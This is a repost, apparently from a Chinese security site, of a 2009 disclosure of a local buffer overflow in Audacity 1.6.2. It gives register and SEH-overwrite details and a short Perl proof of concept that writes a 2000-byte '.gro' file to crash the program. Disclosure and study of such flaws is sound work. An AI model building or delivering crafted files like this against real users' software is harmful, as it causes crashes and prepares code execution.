首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Audacity 1.6.2 (.gro File) Local Buffer Overflow PoC
来源:www.vfcocus.net 作者:Houssamix 发布时间:2009-01-02  
# -----------------------------------------------------------
#  Author : Houssamix
# -----------------------------------------------------------

# Audacity 1.6.2  (.gro file ) Local buffer overflow POC

# download : http://audacity.sourceforge.net/
# Audacity® is free, open source software for recording and editing sounds.

# Description:
# When we select : project > import midi..   and we import ".gro" file contains long Chars
# The Program Will crash and The Following Happen:

# EAX:05050504  ECX:01414141  EDX:01520608  EBX:0012F154
# ESP:0012EF10  EBP:00000000  ESI:41414141  EDI:00000000
# EIP:006AEC54 audacity.006AEC54

# Access violation When Reading [41414141]
# And Also The Pointer to next SEH record and SE Handler Will gonna BE Over-wrote

# Poc  :
# --------------------------------------------------------

#!/usr/bin/perl
#[*] Bug : Audacity 1.6.2  (.gro file ) Local buffer overflow
use warnings;
use strict;
my $chars   = "\x41" x 2000 ;
my $file="hsmx.gro";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created . import it in audacity  \n";


# ----------------------------------------------------------
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EggBlog 3.1.10 Change Admin Pa
·PHPFootball <= 1.6 (filter.php
·Megacubo 5.0.7 (mega://) Remot
·Elecard MPEG Player 5.5 (.m3u
·Linux Kernel 2.6.18/2.6.24/2.6
·PHP <= 5.2.8 gd library - imag
·VMware <= 2.5.1 (Vmware-authd)
·apache 1.x <=> 2.x suphp (suPH
·Destiny Media Player 1.61 (.m3
·Mozilla Firefox version 3.0.5
·Lito Lite CMS Multiple Cross S
·Safari (Webkit) version 3.2 re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved